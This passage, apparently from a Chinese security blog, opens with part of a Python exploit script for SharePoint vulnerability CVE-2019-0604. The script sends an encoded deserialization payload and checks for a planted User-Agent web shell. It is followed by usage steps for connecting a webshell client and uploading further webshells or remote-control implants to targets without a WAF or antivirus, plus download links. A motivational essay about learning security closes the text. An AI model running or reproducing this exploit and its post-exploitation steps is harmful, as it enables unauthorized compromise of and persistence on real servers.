lbmRlckFzQ29udGVudEVkaXRhYmxlRGl2BQR0cnVlZAICDw8WAh4HVmlzaWJsZWhkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgU0Y3RsMDAkUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbiRjdGwwNyRxdWVyeUJ1dHRvbgUoY3RsMDAkUGxhY2VIb2xkZXJEaWFsb2dCb2R5U2VjdGlvbiRjdGwwNVdO0+ZP+kKR1gMQud0zVHpuy8sqq7e4YSOgfg1USdFj', '__VIEWSTATEGENERATOR':'A123E449', ct1+paySection+'$ctl07$queryTextBox':'', paySpanData:payload1+'4700440016004700160005002700f60067009600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500d500c200020035009700370047005600d600e2004400160047001600e20035005600270067009600360056003700c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3002600730073001600530036005300630013009300330043005600030083009300a300c300f300'+payload2+'5600c300f200d400560047008600f6004600e4001600d6005600e300d000a0000200020002000200c300d400560047008600f60046000500160027001600d60056004700560027003700e300d000a000020002000200020002000200c3001600e600970045009700070056000200870037009600a3004700970007005600d3002200870037004600a3003700470027009600e60076002200e3006200c6004700b300250056003700f600570027003600560044009600360047009600f600e600160027009700d000a0008700d600c600e6003700d30022008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600f20007002700560037005600e6004700160047009600f600e6002200d000a0008700d600c600e6003700a3008700d30022008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c6002200d000a0008700d600c600e6003700a30035009700370047005600d600d30022003600c6002700d200e6001600d600560037000700160036005600'+payload3+'0e200250056000700c6001600360056008200070077004600b2002200d300d300d3002200c200220022009200b300560067001600c60082003600f60046005600c20022005700e600370016006600560022009200b3000200d700b3005200e500620076004700b3000200620076004700b3000200220052003400f600d600d600f600e60005002700f600760027001600d60064009600c600560037005200c500d400960036002700f6003700f600660047000200350086001600270056004600c500750056002600020035005600270067005600270002005400870047005600e60037009600f600e6003700c50013005300c50045005400d4000500c400140045005400c500c40014009500f400550045003500c50057001600e2001600370007008700220002006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b300d000a000900090006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b300d000a00090006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700620076004700b300d000a0006200c6004700b300f200250056003700f600570027003600560044009600360047009600f600e600160027009700620076004700b300d000a000c300f2001600e60097004500970007005600e300d000a0000200020002000200c300f200d400560047008600f60046000500160027001600d60056004700560027003700e300d000a00002000200c300f20005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a000c300f2005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f60067009600460056002700e300', ct1+paySection+ct2+'$OriginalEntities':'<Entities />', ct1+paySection+ct2+'$HiddenEntityKey':'', ct1+paySection+ct2+'$HiddenEntityDisplayText':'', ct1+paySection+ct2+'$downlevelTextBox':' ', '__CALLBACKID':ct1+paySection+'$ctl07', '__CALLBACKPARAM':';#;#11;#;#;#', '__EVENTVALIDATION':'/wEdAArGxMN0ZJ7K9w5zktdyYEhBD0ElpjQ1qya+g3gJn5tj2kGdpzwPwReE9qIrxAfsdm2iW+aWbiEcyxsYaScsTlQ450VsGNyXdI9EVzK0gDisZ5XfOLdqAfYHRFskSc14VkFc8gJL9PF80m6F3xAWwiF2sOBSyZzTvibJdZIQ6/yiluhmzA7nAUttaM/XaeAk14GgLvO2vw2Ax/oUZshBCs1rvRIjfjnjQxx1nrwDNJpAlG8icRe2xKLDvCGTmWjcu2A='} data = urllib.urlencode(values) req = urllib2.Request(url+spver, data) response = urllib2.urlopen(req) the_page = response.read() print exp+' '+payload5 print the_page headers = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language": "en", "Cache-Control": "max-age=0", "Connection": "keep-alive", "Cookie": "PHPSESSID=m2hbrvp548cg6v4ssp0l35kcj7; _ga=GA1.2.2052701472.1532920469; _gid=GA1.2.1351314954.1532920469; __atuvc=3%7C31; __atuvs=5b5e9a0418f6420c001", #"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36", "Upgrade-Insecure-Requests": "1", uapay: payload4, } data = {"__CALLBACKID": "", "__VIEWSTATE": "", 'ctl00$'+paySection+'$': "", "__CALLBACKID": "All", "__CALLBACKPARAM": ""} response = requests.get(shellurl, headers=headers, timeout=5) if response.content=='UAshell': print 'UAshell: '+shellurl
实战:
python cve-2019-0604-exp.py http://k8gege.github.io
若成功返回WebShell地址
UAshell访问报错,大家不要慌,原本设计就是这样子
使用K8飞刀CMD连接,当然你可以通过CMD下载其它的WebShell过去管理
比如菜刀,因为飞刀UA系列的WebShell除了过WAF,均无文件管理功能
使用UA而不使用菜刀一句话,是因为菜刀一句话都是POST,容易被WAF拦截
当然你传过去后发现目标无WAF或无杀软,再传其它Webshell或植入远控都可以
下载:
https://github.com/k8gege/CVE-2019-0604
https://github.com/k8gege/K8tools/raw/master/cve-2019-0604-exp.py
Tips:
最近刚高考完不久,所以会在群里看到一些人说学信息安全需要英文、数学好才能学得好。
1.英文
英语这个就不用说了,文章开头的“段子”,最早是剑桥大学发的,就是说那个“段子”是英文的
说明了什么,所谓语法并不重要,中文也是一样,当你有一定意识,乱你也看得懂。
打个比方,大家都懂的SQL注入基础,文中告诉你注入点URL和SQL注入参数,
不管是英文还是中文文章,你都知道如何利用Sqlmap去跑吧,但是你让一个无基础的
就算是中文的写的非常详细的,不说中文有人用他的家乡话和他说,他都不懂。
文章开头那个“段子”看完大脑自动排序拼接成通顺句子,前提也是他有一定基础
很多人说什么新的漏洞新的APT攻击都是英文的看不懂,这关英文的事???
GOOGLE翻译、百度翻译被你吃了???最多就是翻译后中文顺序乱而已?
你没上过小学,汉字都看不懂???真正看不懂的人是所谓APT里的技术看的人不懂
目前90%的APT文章所提到的技术80%都是10年前的技术,并无多少新技术。
倒是新的名词一堆一堆,和以前相比听起来非常高大上,实际上技术变化不大。
2.数学
数学如果说是考试的话,数学方面国人绝对甩老外几百条街,
听说国外对数很头疼 ,国外很多大学数学内容竟是中国初中数学
但是最好笑的是很多数学定理却是老外发明的,是不是说明了什么
为什么老外考试很差,但科技还是很多方面却非常强。
3.实例
先给大家举个例子,我有两个高中同学一个是当年唯一考得上柳高的人综合成绩全年级第一。
另一个也很历害,年级前10吧,但我重点要说的是他的英文很优秀,物理数学也算是优吧
但单科他们都要请教我,比如我物理化学基本上也是全年级第一,而且是实打实,得知几分
立马知道错哪里,为什么错那种,而其它人表面高分,未必知到错哪,需老师讲解后才懂。
而我是全校出了名的偏科,我的英文并不好(初中的时候英文老师说我不学英文就混不了)
表面上我英文几十分偶尔极格,就算是也只是表面极格,实际上我的英文和倒数第一差不多
对于两位高中同学,我给他们英文数学的评价优秀,大学他们去学了计算机软件开发专业。
大学的时候他们和我说毕业以后要给银行开发系统什么之类的,听着非常牛逼的样子。
当时他们吹自己IT方面很牛,黑客技术很历害,说自己的生活费都是盗号来的。
我以为他们真的很历害,因为当时盗号真的很容易,那会我还不是很会编程。
在我眼里会编程的很牛B,何况他们说他们随便写什么系统,盗号软件之类的。
过了半年左右吧,回老家遇到他们,他们好像知道我真的懂,就和我说他们是吹的
想和我学,我说你们要真有兴趣可以去哪些网站上面有我视频,也没见他们去。
毕业听说成绩全年级第一的现在听说在跑业务了,另外一个现在在当小学老师。
不说我的同学,你们的同学,先不说有多少进入这行的大牛和信安专业无关,
先看看你们很多信安专业毕业的,同一个班里有几个毕业了从事信安专业的?
有些人的同学里有那些英文很好的,但也没见得从事这行呀。
4.我认为学好IT最重要的一点是兴趣、逻辑思维
解数学题是训练逻辑思维的最好方法,数学好的逻辑思维基本上都不错。
但数学并不是唯一的训练方法,比如推理、下棋啊,需要思考的方法
渗透的时候不就是需要尝试各种方法吗,写程序也一样需要尝试各种函数
很多程序员死板,是因为他们的工作太单一,来来去去就写固定模块或功能
当然逻辑思维不错,也不代表他在IT方面就强,他还得有兴趣学这个。
注意我指的是那些真懂的,不是死记硬背不懂举一反三,表面考试高分的那种。
这也是为什么很多人考试历害,实际上却干不过国外的真正原因。
如果笨的人呢就不适合这行吗?当然没有别人聪明也没关系,你需要多花时间学习
最多就是起步慢一些,很多东西自然会懂的,来来去去就几招,没有学不会的。
但是你自己菜,还要拿英语、数学不好这种来当借口的话,我认为你是真的不适合
如果你一直干这行,你的水平会一直停留在等别人发布文章或工具甚至教程的状态。
就拿本文EXP来说,你说英文不好是吧,你可以不看原文,国内有很多英文好的翻译好了
有直接的中文文章中文你看不懂吗?再说cve-2019-0604漏洞出来那么久,你身边英文好的
有几个研究出EXP了?对于中文的很多人都看得懂了吧,为什么也还没人放出EXP工具
真正的原因是什么,并非你是否看得懂哪国文字,根本原因在于你当前的技术水平。
英文好最多就是看英文和看中文一样流畅,翻译成中文看起来一样速度快(大脑自动排序)
明明错乱顺序的文字你一样看得懂,更何况大部份翻译也不是太差,菜和英文真的无关。
写代码就更不需要了,很多开发工具都有提示的,打出首字母会显示出很多,
只要你知道大概长啥样就可以,再不济百度Google查询,微软工程师开发的工具,
写代码时自己都要查看相关文档,科学家研究东西照样需要查找各种资料。
还有很多大牛都说看书只是入门,GOOGLE才是提高(TK在微博和知乎上也经常说这句话)
你区区一个搞IT的,百度GOOGLE查资料你丢脸了?又菜又懒还喜欢找各种借口
这个世界上最可怕的不是有人比你聪明。而是那些比你聪明的人。还比你努力。